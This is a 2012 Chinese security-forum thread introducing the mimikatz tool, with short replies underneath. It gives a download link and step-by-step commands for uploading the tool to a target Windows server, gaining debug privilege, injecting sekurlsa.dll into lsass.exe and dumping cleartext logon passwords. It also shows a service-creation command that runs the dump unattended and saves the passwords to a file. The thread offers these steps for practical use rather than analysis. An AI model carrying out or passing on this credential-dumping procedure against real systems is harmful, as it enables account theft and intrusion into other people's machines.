首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 看雪峰会 看雪商城 证书查询
  1. 社区
  2. WEB安全
    3. 发新帖
可怕的神器:抓取windows明文密钥--mimikatz
发表于: 2012-4-11 09:19 11820

可怕的神器:抓取windows明文密钥--mimikatz

package 活跃值
2012-4-11 09:19
11820
先放软件地址:
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip

这是一位法国人写的一个工具,非常强大,可以说有点颠覆的感觉。下面听我慢慢道来:
由于本人初到kanxue不知道怎么插入图片,测试图没法放上来,所以尽量文字了。
大家可以先看一篇博文,这是关于mimikatz直接从 lsass.exe 中获取当前用户明文密码的文章:
http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from-lsass

大家都知道windows的密码是可逆的加密算法,hash算法是不可逆的,因此很多做渗透的人往往利用wce.exe 或 lslsass.exe这两个工具取得hash 值,利用彩虹表跑密码。这种方式比较暴力。而此工具在注入 lsass.exe 时。调用的 sekurlsa.dll 应该包含了对应的解密算法,因此才能抓到明文密码。懂逆向分析的朋友可以测试下,本人在这里就不过多赘述了。

这个工具可以提升进程权限,注入进程,读取进程内存,调试程序等等很多功能,大家有空可以试一试。

该工具对win 03 win08 vista win7均有效,xp(不稳定),2000 不行(至少目前测试结果来看)

测试环境:
windows server 2003 Enterprise Edition 5.2.3790 sp2

测试步骤:
1、要抓去密码,需要找到以下三个文件:
mimikatz_trunk\tools\PsExec.exe
mimikatz_trunk\Win32\mimikatz.exe
mimikatz_trunk\Win32\sekurlsa.dll 

2、上传至目标服务器,(路径不含中文,否则加载DLL的时候会报错),目录要有执行权限。
3、可以通过以下方法抓取:

//PsExec.exe 启动。
//在本机启动交互式命令提示窗口(远程执行)
psexec \\127.0.0.1 cmd.exe
//启动 mimikatz.exe
C:\mimikatz_trunk\Win32\mimikatz.exe
//提权
privilege::debug
//注入dll,注意使用绝对路径
inject::process lsass.exe "C:\mimikatz_trunk\Win32\sekurlsa.dll"
//抓取密码
@getLogonPasswords
//退出,不要用 ctrl + c,会导致 mimikatz.exe CPU 占用达到 100%,死循环。
exit

//*********************************************************

//使用 At 启动
at ***

//*********************************************************

//创建服务方法
sc create getpassword binpath= "cmd.exe /c c:\xxx\mimikatz.exe < command.txt > password.txt"
sc start getpassword
Ps:怎么插入本地图片告诉我一下,纠结ing……

[课程]Linux pwn 探索篇!

上传的附件:
收藏
免费 0
支持
分享
最新回复 (10)
pxf
雪    币: 252
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
pxf
2
这个工具出来很久了
2012-4-11 09:56
0
xouou
雪    币: 90
活跃值: (91)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
3
支持一下,

楼主说什么神器不神器的,我是菜鸟我没看出来

不过在看雪发帖还是低调些的好,标题要低调!

Opera自动回帖补丁,插图补丁,字数补丁...
2012-4-11 11:02
0
zzcc
雪    币: 240
活跃值: (222)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
4
貌似有点强悍。。。
2012-4-11 11:21
0
少尉
雪    币: 2371
活跃值: (304)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
5
03SP2 提权失败.
2012-4-11 16:55
0
aslduke
雪    币: 33
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
6
发帖和做人一样
要低调
2012-5-9 13:33
0
cnyyk
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
7
thanks for sharing...

bro.
2012-5-21 10:50
0
rainboys
雪    币: 63
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
8
倒数第二步000000005错误是什么原因呢
2012-6-6 10:15
0
kxxylt
雪    币: 62
活跃值: (810)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
9
黑客防线上09年就已经发展明文获取密码的文章了!
2012-6-6 11:07
0
陈旭A
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
10
支持一下,

楼主说什么神器不神器的,我是菜鸟我没看出来

不过在看雪发帖还是低调些的好,标题要低调!
2012-8-23 14:55
0
coverme
雪    币: 204
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
11
发帖和做人一样
要低调
2012-8-24 14:39
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回
//